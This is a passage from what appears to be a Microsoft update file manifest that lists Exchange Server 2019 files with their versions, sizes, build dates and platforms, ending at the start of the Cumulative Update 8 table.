Microsoft.exchange.systemprobemsg.dll| 15.2.858.9| 13,200| 04-Apr-2021| 08:30| x64
Microsoft.exchange.textprocessing.dll| 15.2.858.9| 221,568| 04-Apr-2021| 08:29| x86
Microsoft.exchange.textprocessing.eventlog.dll| 15.2.858.9| 13,704| 04-Apr-2021| 08:27| x64
Microsoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.858.10| 29,064| 04-Apr-2021| 08:33| x86
Microsoft.exchange.transport.agent.antispam.common.dll| 15.2.858.10| 138,648| 04-Apr-2021| 08:31| x86
Microsoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.858.9| 21,896| 04-Apr-2021| 08:39| x86
Microsoft.exchange.transport.agent.controlflow.dll| 15.2.858.10| 40,320| 04-Apr-2021| 08:28| x86
Microsoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.858.10| 22,912| 04-Apr-2021| 08:42| x86
Microsoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.858.10| 21,376| 04-Apr-2021| 08:38| x86
Microsoft.exchange.transport.agent.hygiene.dll| 15.2.858.10| 212,352| 04-Apr-2021| 08:43| x86
Microsoft.exchange.transport.agent.interceptoragent.dll| 15.2.858.10| 98,696| 04-Apr-2021| 08:32| x86
Microsoft.exchange.transport.agent.liveidauth.dll| 15.2.858.10| 22,920| 04-Apr-2021| 08:33| x86
Microsoft.exchange.transport.agent.malware.dll| 15.2.858.10| 169,352| 04-Apr-2021| 08:34| x86
Microsoft.exchange.transport.agent.malware.eventlog.dll| 15.2.858.9| 18,304| 04-Apr-2021| 08:33| x64
Microsoft.exchange.transport.agent.phishingdetection.dll| 15.2.858.9| 20,880| 04-Apr-2021| 08:35| x86
Microsoft.exchange.transport.agent.prioritization.dll| 15.2.858.10| 31,624| 04-Apr-2021| 08:27| x86
Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.858.10| 46,976| 04-Apr-2021| 08:39| x86
Microsoft.exchange.transport.agent.search.dll| 15.2.858.10| 30,088| 04-Apr-2021| 08:32| x86
Microsoft.exchange.transport.agent.senderid.core.dll| 15.2.858.9| 53,136| 04-Apr-2021| 08:43| x86
Microsoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.858.10| 44,936| 04-Apr-2021| 08:35| x86
Microsoft.exchange.transport.agent.systemprobedrop.dll| 15.2.858.9| 18,328| 04-Apr-2021| 08:32| x86
Microsoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.858.10| 46,488| 04-Apr-2021| 08:39| x86
Microsoft.exchange.transport.agent.trustedmailagents.dll| 15.2.858.10| 46,472| 04-Apr-2021| 08:27| x86
Microsoft.exchange.transport.cloudmonitor.common.dll| 15.2.858.9| 28,024| 04-Apr-2021| 08:39| x86
Microsoft.exchange.transport.common.dll| 15.2.858.9| 457,088| 04-Apr-2021| 08:32| x86
Microsoft.exchange.transport.contracts.dll| 15.2.858.9| 18,304| 04-Apr-2021| 08:33| x86
Microsoft.exchange.transport.decisionengine.dll| 15.2.858.9| 30,592| 04-Apr-2021| 08:32| x86
Microsoft.exchange.transport.dll| 15.2.858.10| 4,183,936| 04-Apr-2021| 08:31| x86
Microsoft.exchange.transport.dsapiclient.dll| 15.2.858.9| 182,168| 04-Apr-2021| 08:39| x86
Microsoft.exchange.transport.eventlog.dll| 15.2.858.9| 121,752| 04-Apr-2021| 08:33| x64
Microsoft.exchange.transport.extensibility.dll| 15.2.858.9| 403,848| 04-Apr-2021| 08:31| x86
Microsoft.exchange.transport.extensibilityeventlog.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:27| x64
Microsoft.exchange.transport.flighting.dll| 15.2.858.9| 90,000| 04-Apr-2021| 08:34| x86
Microsoft.exchange.transport.logging.dll| 15.2.858.9| 88,960| 04-Apr-2021| 08:34| x86
Microsoft.exchange.transport.logging.search.dll| 15.2.858.9| 68,496| 04-Apr-2021| 08:31| x86
Microsoft.exchange.transport.loggingcommon.dll| 15.2.858.9| 63,360| 04-Apr-2021| 08:30| x86
Microsoft.exchange.transport.monitoring.dll| 15.2.858.10| 430,488| 04-Apr-2021| 08:33| x86
Microsoft.exchange.transport.net.dll| 15.2.858.9| 122,248| 04-Apr-2021| 08:33| x86
Microsoft.exchange.transport.protocols.contracts.dll| 15.2.858.9| 17,784| 04-Apr-2021| 08:39| x86
Microsoft.exchange.transport.protocols.dll| 15.2.858.9| 29,048| 04-Apr-2021| 08:39| x86
Microsoft.exchange.transport.protocols.httpsubmission.dll| 15.2.858.9| 60,800| 04-Apr-2021| 08:43| x86
Microsoft.exchange.transport.requestbroker.dll| 15.2.858.9| 50,072| 04-Apr-2021| 08:34| x86
Microsoft.exchange.transport.scheduler.contracts.dll| 15.2.858.9| 33,152| 04-Apr-2021| 08:33| x86
Microsoft.exchange.transport.scheduler.dll| 15.2.858.9| 113,032| 04-Apr-2021| 08:31| x86
Microsoft.exchange.transport.smtpshared.dll| 15.2.858.9| 18,320| 04-Apr-2021| 08:33| x86
Microsoft.exchange.transport.storage.contracts.dll| 15.2.858.9| 52,104| 04-Apr-2021| 08:33| x86
Microsoft.exchange.transport.storage.dll| 15.2.858.9| 675,208| 04-Apr-2021| 08:33| x86
Microsoft.exchange.transport.storage.management.dll| 15.2.858.10| 23,936| 04-Apr-2021| 08:33| x86
Microsoft.exchange.transport.sync.agents.dll| 15.2.858.10| 17,808| 04-Apr-2021| 08:34| x86
Microsoft.exchange.transport.sync.common.dll| 15.2.858.10| 487,320| 04-Apr-2021| 08:32| x86
Microsoft.exchange.transport.sync.common.eventlog.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:27| x64
Microsoft.exchange.transport.sync.manager.dll| 15.2.858.10| 306,056| 04-Apr-2021| 08:39| x86
Microsoft.exchange.transport.sync.manager.eventlog.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:34| x64
Microsoft.exchange.transport.sync.migrationrpc.dll| 15.2.858.10| 46,464| 04-Apr-2021| 08:32| x86
Microsoft.exchange.transport.sync.worker.dll| 15.2.858.10| 1,044,376| 04-Apr-2021| 08:32| x86
Microsoft.exchange.transport.sync.worker.eventlog.dll| 15.2.858.9| 15,224| 04-Apr-2021| 08:27| x64
Microsoft.exchange.transportlogsearch.eventlog.dll| 15.2.858.9| 18,840| 04-Apr-2021| 08:32| x64
Microsoft.exchange.transportsyncmanagersvc.exe| 15.2.858.10| 18,832| 04-Apr-2021| 08:39| x86
Microsoft.exchange.um.troubleshootingtool.shared.dll| 15.2.858.9| 118,656| 04-Apr-2021| 08:34| x86
Microsoft.exchange.um.umcommon.dll| 15.2.858.10| 924,552| 04-Apr-2021| 08:31| x86
Microsoft.exchange.um.umcore.dll| 15.2.858.10| 1,469,320| 04-Apr-2021| 08:39| x86
Microsoft.exchange.um.umvariantconfiguration.dll| 15.2.858.9| 32,648| 04-Apr-2021| 08:27| x86
Microsoft.exchange.unifiedcontent.dll| 15.2.858.9| 41,864| 04-Apr-2021| 08:33| x86
Microsoft.exchange.unifiedcontent.exchange.dll| 15.2.858.9| 24,960| 04-Apr-2021| 08:31| x86
Microsoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:28| x64
Microsoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.858.10| 83,336| 04-Apr-2021| 08:44| x86
Microsoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.858.10| 50,056| 04-Apr-2021| 08:38| x86
Microsoft.exchange.variantconfiguration.antispam.dll| 15.2.858.9| 642,456| 04-Apr-2021| 08:32| x86
Microsoft.exchange.variantconfiguration.core.dll| 15.2.858.9| 186,248| 04-Apr-2021| 08:27| x86
Microsoft.exchange.variantconfiguration.dll| 15.2.858.9| 67,464| 04-Apr-2021| 08:27| x86
Microsoft.exchange.variantconfiguration.eventlog.dll| 15.2.858.9| 12,664| 04-Apr-2021| 08:27| x64
Microsoft.exchange.variantconfiguration.excore.dll| 15.2.858.9| 56,712| 04-Apr-2021| 08:27| x86
Microsoft.exchange.variantconfiguration.globalsettings.dll| 15.2.858.9| 27,528| 04-Apr-2021| 08:27| x86
Microsoft.exchange.variantconfiguration.hygiene.dll| 15.2.858.9| 120,720| 04-Apr-2021| 08:32| x86
Microsoft.exchange.variantconfiguration.protectionservice.dll| 15.2.858.9| 31,624| 04-Apr-2021| 08:32| x86
Microsoft.exchange.variantconfiguration.threatintel.dll| 15.2.858.9| 57,224| 04-Apr-2021| 08:30| x86
Microsoft.exchange.webservices.auth.dll| 15.2.858.9| 35,704| 04-Apr-2021| 08:31| x86
Microsoft.exchange.webservices.dll| 15.2.858.9| 1,054,088| 04-Apr-2021| 08:29| x86
Microsoft.exchange.webservices.xrm.dll| 15.2.858.9| 67,976| 04-Apr-2021| 08:39| x86
Microsoft.exchange.wlmservicelet.dll| 15.2.858.10| 23,432| 04-Apr-2021| 08:38| x86
Microsoft.exchange.wopiclient.dll| 15.2.858.9| 77,176| 04-Apr-2021| 08:31| x86
Microsoft.exchange.workingset.signalapi.dll| 15.2.858.9| 17,288| 04-Apr-2021| 08:44| x86
Microsoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.858.9| 29,056| 04-Apr-2021| 08:44| x86
Microsoft.exchange.workloadmanagement.dll| 15.2.858.9| 505,240| 04-Apr-2021| 08:30| x86
Microsoft.exchange.workloadmanagement.eventlogs.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:34| x64
Microsoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.858.9| 36,744| 04-Apr-2021| 08:31| x86
Microsoft.exchange.workloadmanagement.throttling.dll| 15.2.858.9| 66,448| 04-Apr-2021| 08:29| x86
Microsoft.fast.contextlogger.json.dll| 15.2.858.9| 19,352| 04-Apr-2021| 08:39| x86
Microsoft.filtering.dll| 15.2.858.9| 113,016| 04-Apr-2021| 08:32| x86
Microsoft.filtering.exchange.dll| 15.2.858.10| 57,224| 04-Apr-2021| 08:32| x86
Microsoft.filtering.interop.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:31| x86
Microsoft.forefront.activedirectoryconnector.dll| 15.2.858.9| 46,992| 04-Apr-2021| 08:44| x86
Microsoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.858.9| 15,768| 04-Apr-2021| 08:43| x64
Microsoft.forefront.filtering.common.dll| 15.2.858.9| 23,936| 04-Apr-2021| 08:28| x86
Microsoft.forefront.filtering.diagnostics.dll| 15.2.858.9| 22,408| 04-Apr-2021| 08:28| x86
Microsoft.forefront.filtering.eventpublisher.dll| 15.2.858.9| 34,688| 04-Apr-2021| 08:27| x86
Microsoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,945| 04-Apr-2021| 08:31| Not applicable
Microsoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,325| 04-Apr-2021| 08:31| Not applicable
Microsoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.858.10| 1,518,472| 04-Apr-2021| 08:35| x86
Microsoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:32| x64
Microsoft.forefront.monitoring.management.outsidein.dll| 15.2.858.10| 33,168| 04-Apr-2021| 08:31| x86
Microsoft.forefront.recoveryactionarbiter.contract.dll| 15.2.858.9| 18,312| 04-Apr-2021| 08:31| x86
Microsoft.forefront.reporting.common.dll| 15.2.858.10| 46,488| 04-Apr-2021| 08:31| x86
Microsoft.forefront.reporting.ondemandquery.dll| 15.2.858.10| 50,568| 04-Apr-2021| 08:31| x86
Microsoft.isam.esent.collections.dll| 15.2.858.9| 72,584| 04-Apr-2021| 08:39| x86
Microsoft.isam.esent.interop.dll| 15.2.858.9| 541,576| 04-Apr-2021| 08:31| x86
Microsoft.managementgui.dll| 15.2.858.9| 133,520| 04-Apr-2021| 08:39| x86
Microsoft.mce.interop.dll| 15.2.858.9| 24,448| 04-Apr-2021| 08:32| x86
Microsoft.office.audit.dll| 15.2.858.9| 124,800| 04-Apr-2021| 08:29| x86
Microsoft.office.client.discovery.unifiedexport.dll| 15.2.858.9| 593,296| 04-Apr-2021| 08:27| x86
Microsoft.office.common.ipcommonlogger.dll| 15.2.858.9| 42,376| 04-Apr-2021| 08:32| x86
Microsoft.office.compliance.console.core.dll| 15.2.858.10| 217,976| 04-Apr-2021| 08:29| x86
Microsoft.office.compliance.console.dll| 15.2.858.10| 854,936| 04-Apr-2021| 08:28| x86
Microsoft.office.compliance.console.extensions.dll| 15.2.858.10| 485,760| 04-Apr-2021| 08:27| x86
Microsoft.office.compliance.core.dll| 15.2.858.9| 413,064| 04-Apr-2021| 08:32| x86
Microsoft.office.compliance.ingestion.dll| 15.2.858.9| 36,232| 04-Apr-2021| 08:33| x86
Microsoft.office.compliancepolicy.exchange.dar.dll| 15.2.858.10| 84,864| 04-Apr-2021| 08:33| x86
Microsoft.office.compliancepolicy.platform.dll| 15.2.858.9| 1,782,136| 04-Apr-2021| 08:29| x86
Microsoft.office.datacenter.activemonitoring.management.common.dll| 15.2.858.10| 49,536| 04-Apr-2021| 08:27| x86
Microsoft.office.datacenter.activemonitoring.management.dll| 15.2.858.10| 27,544| 04-Apr-2021| 08:27| x86
Microsoft.office.datacenter.activemonitoringlocal.dll| 15.2.858.9| 174,976| 04-Apr-2021| 08:28| x86
Microsoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.858.9| 166,272| 04-Apr-2021| 08:28| x86
Microsoft.office365.datainsights.uploader.dll| 15.2.858.9| 40,328| 04-Apr-2021| 08:28| x86
Microsoft.online.box.shell.dll| 15.2.858.9| 46,472| 04-Apr-2021| 08:27| x86
Microsoft.powershell.hostingtools.dll| 15.2.858.9| 67,992| 04-Apr-2021| 08:29| x86
Microsoft.powershell.hostingtools_2.dll| 15.2.858.9| 67,992| 04-Apr-2021| 08:29| x86
Microsoft.tailoredexperiences.core.dll| 15.2.858.9| 120,200| 04-Apr-2021| 08:33| x86
Migrateumcustomprompts.ps1| Not applicable| 19,150| 04-Apr-2021| 08:38| Not applicable
Modernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,088| 04-Apr-2021| 08:38| Not applicable
Movemailbox.ps1| Not applicable| 61,196| 04-Apr-2021| 08:36| Not applicable
Movetransportdatabase.ps1| Not applicable| 30,622| 04-Apr-2021| 08:37| Not applicable
Move_publicfolderbranch.ps1| Not applicable| 17,556| 04-Apr-2021| 08:37| Not applicable
Mpgearparser.dll| 15.2.858.9| 99,720| 04-Apr-2021| 08:29| x64
Msclassificationadapter.dll| 15.2.858.9| 248,712| 04-Apr-2021| 08:28| x64
Msexchangecompliance.exe| 15.2.858.10| 78,720| 04-Apr-2021| 08:28| x86
Msexchangedagmgmt.exe| 15.2.858.10| 25,472| 04-Apr-2021| 08:39| x86
Msexchangedelivery.exe| 15.2.858.10| 38,792| 04-Apr-2021| 08:39| x86
Msexchangefrontendtransport.exe| 15.2.858.10| 31,616| 04-Apr-2021| 08:39| x86
Msexchangehmhost.exe| 15.2.858.10| 27,032| 04-Apr-2021| 08:27| x86
Msexchangehmrecovery.exe| 15.2.858.9| 29,584| 04-Apr-2021| 08:32| x86
Msexchangemailboxassistants.exe| 15.2.858.10| 72,584| 04-Apr-2021| 08:39| x86
Msexchangemailboxreplication.exe| 15.2.858.10| 20,872| 04-Apr-2021| 08:43| x86
Msexchangemigrationworkflow.exe| 15.2.858.10| 69,000| 04-Apr-2021| 08:39| x86
Msexchangerepl.exe| 15.2.858.10| 71,040| 04-Apr-2021| 08:38| x86
Msexchangesubmission.exe| 15.2.858.10| 123,288| 04-Apr-2021| 08:39| x86
Msexchangethrottling.exe| 15.2.858.9| 39,832| 04-Apr-2021| 08:39| x86
Msexchangetransport.exe| 15.2.858.9| 74,104| 04-Apr-2021| 08:39| x86
Msexchangetransportlogsearch.exe| 15.2.858.10| 139,152| 04-Apr-2021| 08:39| x86
Msexchangewatchdog.exe| 15.2.858.9| 55,688| 04-Apr-2021| 08:39| x64
Mspatchlinterop.dll| 15.2.858.9| 53,640| 04-Apr-2021| 08:38| x64
Nativehttpproxy.dll| 15.2.858.9| 91,528| 04-Apr-2021| 08:42| x64
Navigatorparser.dll| 15.2.858.9| 636,800| 04-Apr-2021| 08:29| x64
Nego2nativeinterface.dll| 15.2.858.9| 19,336| 04-Apr-2021| 08:38| x64
Negotiateclientcertificatemodule.dll| 15.2.858.9| 30,080| 04-Apr-2021| 08:32| x64
Newtestcasconnectivityuser.ps1| Not applicable| 19,792| 04-Apr-2021| 08:37| Not applicable
Newtestcasconnectivityuserhosting.ps1| Not applicable| 24,607| 04-Apr-2021| 08:35| Not applicable
Ntspxgen.dll| 15.2.858.9| 80,776| 04-Apr-2021| 08:42| x64
Oleconverter.exe| 15.2.858.9| 173,960| 04-Apr-2021| 08:39| x64
Outsideinmodule.dll| 15.2.858.9| 87,944| 04-Apr-2021| 08:29| x64
Owaauth.dll| 15.2.858.9| 92,040| 04-Apr-2021| 08:39| x64
Perf_common_extrace.dll| 15.2.858.9| 245,128| 04-Apr-2021| 08:31| x64
Perf_exchmem.dll| 15.2.858.9| 86,400| 04-Apr-2021| 08:29| x64
Pipeline2.dll| 15.2.858.9| 1,454,480| 04-Apr-2021| 08:28| x64
Preparemoverequesthosting.ps1| Not applicable| 71,023| 04-Apr-2021| 08:38| Not applicable
Prepare_moverequest.ps1| Not applicable| 73,257| 04-Apr-2021| 08:37| Not applicable
Productinfo.managed.dll| 15.2.858.9| 27,024| 04-Apr-2021| 08:29| x86
Proxybinclientsstringsdll| 15.2.858.9| 924,552| 04-Apr-2021| 08:33| x86
Publicfoldertomailboxmapgenerator.ps1| Not applicable| 23,266| 04-Apr-2021| 08:36| Not applicable
Quietexe.exe| 15.2.858.9| 14,728| 04-Apr-2021| 08:39| x86
Redistributeactivedatabases.ps1| Not applicable| 250,572| 04-Apr-2021| 08:39| Not applicable
Reinstalldefaulttransportagents.ps1| Not applicable| 21,659| 04-Apr-2021| 08:38| Not applicable
Remoteexchange.ps1| Not applicable| 23,577| 04-Apr-2021| 08:43| Not applicable
Removeuserfrompfrecursive.ps1| Not applicable| 14,708| 04-Apr-2021| 08:36| Not applicable
Replaceuserpermissiononpfrecursive.ps1| Not applicable| 15,026| 04-Apr-2021| 08:37| Not applicable
Replaceuserwithuseronpfrecursive.ps1| Not applicable| 15,040| 04-Apr-2021| 08:38| Not applicable
Replaycrimsonmsg.dll| 15.2.858.9| 1,104,768| 04-Apr-2021| 08:31| x64
Resetattachmentfilterentry.ps1| Not applicable| 15,480| 04-Apr-2021| 08:39| Not applicable
Resetcasservice.ps1| Not applicable| 21,731| 04-Apr-2021| 08:36| Not applicable
Reset_antispamupdates.ps1| Not applicable| 14,105| 04-Apr-2021| 08:39| Not applicable
Restoreserveronprereqfailure.ps1| Not applicable| 15,129| 04-Apr-2021| 08:39| Not applicable
Resumemailboxdatabasecopy.ps1| Not applicable| 17,198| 04-Apr-2021| 08:39| Not applicable
Rightsmanagementwrapper.dll| 15.2.858.9| 86,424| 04-Apr-2021| 08:39| x64
Rollalternateserviceaccountpassword.ps1| Not applicable| 55,810| 04-Apr-2021| 08:37| Not applicable
Rpcperf.dll| 15.2.858.9| 23,432| 04-Apr-2021| 08:43| x64
Rpcproxyshim.dll| 15.2.858.9| 39,320| 04-Apr-2021| 08:37| x64
Rulesauditmsg.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x64
Safehtmlnativewrapper.dll| 15.2.858.9| 34,696| 04-Apr-2021| 08:39| x64
Scanenginetest.exe| 15.2.858.9| 956,296| 04-Apr-2021| 08:27| x64
Scanningprocess.exe| 15.2.858.9| 739,208| 04-Apr-2021| 08:32| x64
Searchdiagnosticinfo.ps1| Not applicable| 16,840| 04-Apr-2021| 08:36| Not applicable
Servicecontrol.ps1| Not applicable| 52,317| 04-Apr-2021| 08:27| Not applicable
Setmailpublicfolderexternaladdress.ps1| Not applicable| 20,782| 04-Apr-2021| 08:36| Not applicable
Settingsadapter.dll| 15.2.858.9| 116,104| 04-Apr-2021| 08:27| x64
Setup.exe| 15.2.858.9| 20,352| 04-Apr-2021| 08:30| x86
Setupui.exe| 15.2.858.10| 188,296| 04-Apr-2021| 08:43| x86
Split_publicfoldermailbox.ps1| Not applicable| 52,217| 04-Apr-2021| 08:35| Not applicable
Startdagservermaintenance.ps1| Not applicable| 27,851| 04-Apr-2021| 08:39| Not applicable
Statisticsutil.dll| 15.2.858.9| 142,232| 04-Apr-2021| 08:29| x64
Stopdagservermaintenance.ps1| Not applicable| 21,137| 04-Apr-2021| 08:38| Not applicable
Storetsconstants.ps1| Not applicable| 15,818| 04-Apr-2021| 08:37| Not applicable
Storetslibrary.ps1| Not applicable| 27,987| 04-Apr-2021| 08:38| Not applicable
Store_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.858.9| 28,552| 04-Apr-2021| 08:40| x64
Sync_mailpublicfolders.ps1| Not applicable| 43,955| 04-Apr-2021| 08:37| Not applicable
Sync_modernmailpublicfolders.ps1| Not applicable| 44,001| 04-Apr-2021| 08:38| Not applicable
Textconversionmodule.dll| 15.2.858.9| 86,408| 04-Apr-2021| 08:27| x64
Troubleshoot_ci.ps1| Not applicable| 22,731| 04-Apr-2021| 08:37| Not applicable
Troubleshoot_databaselatency.ps1| Not applicable| 33,421| 04-Apr-2021| 08:35| Not applicable
Troubleshoot_databasespace.ps1| Not applicable| 30,017| 04-Apr-2021| 08:36| Not applicable
Uninstall_antispamagents.ps1| Not applicable| 15,477| 04-Apr-2021| 08:39| Not applicable
Updateapppoolmanagedframeworkversion.ps1| Not applicable| 14,058| 04-Apr-2021| 08:38| Not applicable
Updatecas.ps1| Not applicable| 35,786| 04-Apr-2021| 08:39| Not applicable
Updateconfigfiles.ps1| Not applicable| 19,730| 04-Apr-2021| 08:39| Not applicable
Updateserver.exe| 15.2.858.9| 3,014,536| 04-Apr-2021| 08:28| x64
Update_malwarefilteringserver.ps1| Not applicable| 18,184| 04-Apr-2021| 08:37| Not applicable
Web.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,814| 04-Apr-2021| 08:34| Not applicable
Wsbexchange.exe| 15.2.858.9| 125,320| 04-Apr-2021| 08:44| x64
X400prox.dll| 15.2.858.9| 103,296| 04-Apr-2021| 08:35| x64
_search.lingoperators.a| 15.2.858.9| 34,688| 04-Apr-2021| 08:39| Not applicable
_search.lingoperators.b| 15.2.858.9| 34,688| 04-Apr-2021| 08:39| Not applicable
_search.mailboxoperators.a| 15.2.858.10| 290,200| 04-Apr-2021| 08:33| Not applicable
_search.mailboxoperators.b| 15.2.858.10| 290,200| 04-Apr-2021| 08:33| Not applicable
_search.operatorschema.a| 15.2.858.9| 485,760| 04-Apr-2021| 08:32| Not applicable
_search.operatorschema.b| 15.2.858.9| 485,760| 04-Apr-2021| 08:32| Not applicable
_search.tokenoperators.a| 15.2.858.9| 113,544| 04-Apr-2021| 08:33| Not applicable
_search.tokenoperators.b| 15.2.858.9| 113,544| 04-Apr-2021| 08:33| Not applicable
_search.transportoperators.a| 15.2.858.10| 67,976| 04-Apr-2021| 08:39| Not applicable
_search.transportoperators.b| 15.2.858.10| 67,976| 04-Apr-2021| 08:39| Not applicable

#### Microsoft Exchange Server 2019 Cumulative Update 8

File name| File version| File size| Date| Time| Platform
---|---|---|---|---|---
Activemonitoringeventmsg.dll| 15.2.792.13| 71,040| 04-Apr-2021| 10:03| x64
Activemonitoringexecutionlibrary.ps1| Not applicable| 29,522| 04-Apr-2021| 10:03| Not applicable
Adduserstopfrecursive.ps1| Not applicable| 14,965| 04-Apr-2021| 10:05| Not applicable
Ademodule.dll| 15.2.792.13| 106,384| 04-Apr-2021| 10:04| x64
Airfilter.dll| 15.2.792.13| 42,888| 04-Apr-2021| 10:03| x64
Ajaxcontroltoolkit.dll| 15.2.792.13| 92,552| 04-Apr-2021| 10:03| x86
Antispamcommon.ps1| Not applicable| 13,505| 04-Apr-2021| 10:05| Not applicable
Asdat.msi| Not applicable| 5,087,232| 04-Apr-2021| 10:03| Not applicable
Asentirs.msi| Not applicable| 77,824| 04-Apr-2021| 10:03| Not applicable
Asentsig.msi| Not applicable| 73,728| 04-Apr-2021| 10:03| Not applicable
Bigfunnel.bondtypes.dll| 15.2.792.13| 45,464| 04-Apr-2021| 10:04| x86
Bigfunnel.common.dll| 15.2.792.13| 66,456| 04-Apr-2021| 10:04| x86
Bigfunnel.configuration.dll| 15.2.792.13| 118,168| 04-Apr-2021| 10:04| x86
Bigfunnel.entropy.dll| 15.2.792.13| 44,440| 04-Apr-2021| 10:04| x86
Bigfunnel.filter.dll| 15.2.792.13| 54,168| 04-Apr-2021| 10:04| x86
Bigfunnel.indexstream.dll| 15.2.792.13| 68,992| 04-Apr-2021| 10:03| x86
Bigfunnel.neuraltree.dll| Not applicable| 694,160| 04-Apr-2021| 10:03| x64
Bigfunnel.neuraltreeranking.dll| 15.2.792.13| 19,848| 04-Apr-2021| 10:03| x86
Bigfunnel.poi.dll| 15.2.792.13| 245,120| 04-Apr-2021| 10:03| x86
Bigfunnel.postinglist.dll| 15.2.792.13| 189,336| 04-Apr-2021| 10:06| x86
Bigfunnel.query.dll| 15.2.792.13| 101,256| 04-Apr-2021| 10:06| x86
Bigfunnel.ranking.dll| 15.2.792.13| 109,448| 04-Apr-2021| 10:05| x86
Bigfunnel.syntheticdatalib.dll| 15.2.792.13| 3,634,576| 04-Apr-2021| 10:04| x86
Bigfunnel.tracing.dll| 15.2.792.13| 42,880| 04-Apr-2021| 10:05| x86
Bigfunnel.wordbreakers.dll| 15.2.792.13| 46,472| 04-Apr-2021| 10:03| x86
Cafe_airfilter_dll| 15.2.792.13| 42,888| 04-Apr-2021| 10:03| x64
Cafe_exppw_dll| 15.2.792.13| 83,328| 04-Apr-2021| 10:04| x64
Cafe_owaauth_dll| 15.2.792.13| 92,032| 04-Apr-2021| 10:04| x64
Calcalculation.ps1| Not applicable| 42,113| 04-Apr-2021| 10:06| Not applicable
Checkdatabaseredundancy.ps1| Not applicable| 94,622| 04-Apr-2021| 10:04| Not applicable
Chksgfiles.dll| 15.2.792.13| 57,216| 04-Apr-2021| 10:07| x64
Citsconstants.ps1| Not applicable| 15,821| 04-Apr-2021| 10:04| Not applicable
Citslibrary.ps1| Not applicable| 82,680| 04-Apr-2021| 10:04| Not applicable
Citstypes.ps1| Not applicable| 14,480| 04-Apr-2021| 10:04| Not applicable
Classificationengine_mce| 15.2.792.13| 1,693,064| 04-Apr-2021| 10:04| Not applicable
Clusmsg.dll| 15.2.792.13| 134,024| 04-Apr-2021| 10:05| x64
Coconet.dll| 15.2.792.13| 48,008| 04-Apr-2021| 10:06| x64
Collectovermetrics.ps1| Not applicable| 81,660| 04-Apr-2021| 10:04| Not applicable
Collectreplicationmetrics.ps1| Not applicable| 41,886| 04-Apr-2021| 10:04| Not applicable
Commonconnectfunctions.ps1| Not applicable| 29,971| 04-Apr-2021| 10:03| Not applicable
Complianceauditservice.exe| 15.2.792.13| 39,800| 04-Apr-2021| 10:07| x86
Configureadam.ps1| Not applicable| 22,804| 04-Apr-2021| 10:06| Not applicable
Configurecaferesponseheaders.ps1| Not applicable| 20,344| 04-Apr-2021| 10:05| Not applicable
Configurecryptodefaults.ps1| Not applicable| 42,055| 04-Apr-2021| 10:06| Not applicable
Configurenetworkprotocolparameters.ps1| Not applicable| 19,806| 04-Apr-2021| 10:05| Not applicable
Configuresmbipsec.ps1| Not applicable| 39,868| 04-Apr-2021| 10:06| Not applicable
Configure_enterprisepartnerapplication.ps1| Not applicable| 22,323| 04-Apr-2021| 10:05| Not applicable
Connectfunctions.ps1| Not applicable| 37,165| 04-Apr-2021| 10:06| Not applicable
Connect_exchangeserver_help.xml| Not applicable| 30,440| 04-Apr-2021| 10:07| Not applicable
Consoleinitialize.ps1| Not applicable| 24,228| 04-Apr-2021| 10:07| Not applicable
Convertoabvdir.ps1| Not applicable| 20,093| 04-Apr-2021| 10:06| Not applicable
Converttomessagelatency.ps1| Not applicable| 14,572| 04-Apr-2021| 10:05| Not applicable
Convert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,805| 04-Apr-2021| 10:06| Not applicable
Create_publicfoldermailboxesformigration.ps1| Not applicable| 27,952| 04-Apr-2021| 10:06| Not applicable
Cts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
